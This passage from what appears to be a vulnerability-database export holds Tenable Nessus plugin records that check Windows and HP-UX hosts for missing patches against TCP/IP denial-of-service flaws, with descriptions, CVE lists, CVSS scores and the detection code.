script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-064';\nkb = '922819';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Tcpip6.sys\", version:\"5.2.3790.576\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Tcpip6.sys\", version:\"5.2.3790.2771\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Tcpip6.sys\", version:\"5.1.2600.1886\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Tcpip6.sys\", version:\"5.1.2600.2975\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:53", "description": "s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP (IPv4). This vulnerability could be remotely exploited to cause a Denial of Service (DoS). (HPSBUX01137 SSRT5954)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)", "cvss3": {"score": null, "vector": null}, "published": "2005-07-05T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33159 : s700_800 11.11 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-1192"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33159.NASL", "href": "https://www.tenable.com/plugins/nessus/18608", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33159. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18608);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-1192\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00571568\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01137\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n script_xref(name:\"HP\", value:\"SSRT5954\");\n\n script_name(english:\"HP-UX PHNE_33159 : s700_800 11.11 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP (IPv4). This vulnerability\n could be remotely exploited to cause a Denial of Service\n (DoS). (HPSBUX01137 SSRT5954)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00571568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9aacfc53\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33159 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/24\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_33159 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_33159\", \"PHNE_33628\", \"PHNE_34135\", \"PHNE_34672\", \"PHNE_35183\", \"PHNE_35351\", \"PHNE_36125\", \"PHNE_37671\", \"PHNE_37898\", \"PHNE_38678\", \"PHNE_39386\", \"PHNE_42029\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN-64\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.SYS-ADMIN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"ProgSupport.C-INC\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:06", "description": "s700_800 11.23 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP (IPv4). This vulnerability could be remotely exploited to cause a Denial of Service (DoS). (HPSBUX01137 SSRT5954)", "cvss3": {"score": null, "vector": null}, "published": "2005-08-01T00:00:00", "type": "nessus", "title": "HP-UX PHNE_32606 : s700_800 11.23 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-1192"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_32606.NASL", "href": "https://www.tenable.com/plugins/nessus/19362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_32606. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19362);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-1192\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00571568\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01137\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n script_xref(name:\"HP\", value:\"SSRT5954\");\n\n script_name(english:\"HP-UX PHNE_32606 : s700_800 11.23 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP (IPv4). This vulnerability\n could be remotely exploited to cause a Denial of Service\n (DoS). (HPSBUX01137 SSRT5954)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00571568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9aacfc53\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_32606 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/30\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_32606 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_32606\", \"PHNE_33798\", \"PHNE_34671\", \"PHNE_35182\", \"PHNE_35765\", \"PHNE_35766\", \"PHNE_37395\", \"PHNE_37670\", \"PHNE_37897\", \"PHNE_38679\", \"PHNE_39387\", \"PHNE_41436\", \"PHNE_42094\", \"PHNE_43215\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:54", "description": "s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - An HP-UX 11.11 machine with TRANSPORT patches PHNE_24211, PHNE_24506, PHNE_25134, or PHNE_25642 may be exposed to a denial of service through the malicious use of the 'ndd' command. (HPSBUX00192 SSRT071390)\n\n - TCP Initial Sequence Number (ISN) randomization specified in RFC 1948 is available for HP-UX.\n References: CVE-2001-0328, CERT CA-2001-09. (HPSBUX00205 SSRT080009)", "cvss3": {"score": null, "vector": null}, "published": "2005-02-16T00:00:00", "type": "nessus", "title": "HP-UX PHNE_25644 : s700_800 11.11 cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2001-0328", "CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_25644.NASL", "href": "https://www.tenable.com/plugins/nessus/16508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_25644. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16508);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2001-0328\", \"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT-CC\", value:\"2001-09\");\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"emr_na-c00994439\");\n script_xref(name:\"HP\", value:\"emr_na-c01336000\");\n script_xref(name:\"HP\", value:\"HPSBUX00192\");\n script_xref(name:\"HP\", value:\"HPSBUX00205\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT071390\");\n script_xref(name:\"HP\", value:\"SSRT080009\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_25644 : s700_800 11.11 cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - An HP-UX 11.11 machine with TRANSPORT patches\n PHNE_24211, PHNE_24506, PHNE_25134, or PHNE_25642 may be\n exposed to a denial of service through the malicious use\n of the 'ndd' command. (HPSBUX00192 SSRT071390)\n\n - TCP Initial Sequence Number (ISN) randomization\n specified in RFC 1948 is available for HP-UX.\n References: CVE-2001-0328, CERT CA-2001-09. (HPSBUX00205\n SSRT080009)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00994439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b75e5227\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01336000\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47614ae6\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_25644 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/04/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_25644 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_25644\", \"PHNE_27063\", \"PHNE_28089\", \"PHNE_28895\", \"PHNE_29887\", \"PHNE_31247\", \"PHNE_33159\", \"PHNE_33628\", \"PHNE_34135\", \"PHNE_34672\", \"PHNE_35183\", \"PHNE_35351\", \"PHNE_36125\", \"PHNE_37671\", \"PHNE_37898\", \"PHNE_38678\", \"PHNE_39386\", \"PHNE_42029\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN-64\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.SYS-ADMIN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"ProgSupport.C-INC\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:47", "description": "s700_800 11.04 (VVOS) cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP. The potential vulnerability could be exploited remotely to cause a Denial of Service (DoS). (HPSBUX02087 SSRT4728)", "cvss3": {"score": null, "vector": null}, "published": "2005-08-23T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33427 : s700_800 11.04 (VVOS) cumulative ARPA Transport patch", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0744", "CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-4316"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33427.NASL", "href": "https://www.tenable.com/plugins/nessus/19486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33427. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19486);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0744\", \"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-4316\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"emr_na-c00579189\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"HPSBUX02087\");\n script_xref(name:\"HP\", value:\"SSRT4728\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_33427 : s700_800 11.04 (VVOS) cumulative ARPA Transport patch\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. This vulnerability could be\n remotely exploited by an unauthorized user to cause a\n Denial of Service(DoS). References: NISCC VU#532967,\n CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\n (HPSBUX01164 SSRT4884)\n\n - A potential security vulnerability has been identified\n with HP-UX running TCP/IP. The potential vulnerability\n could be exploited remotely to cause a Denial of Service\n (DoS). (HPSBUX02087 SSRT4728)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00579189\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d45f7410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33427 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/08/11\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_33427 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_33427\");\nforeach patch (patches)\n{\n if 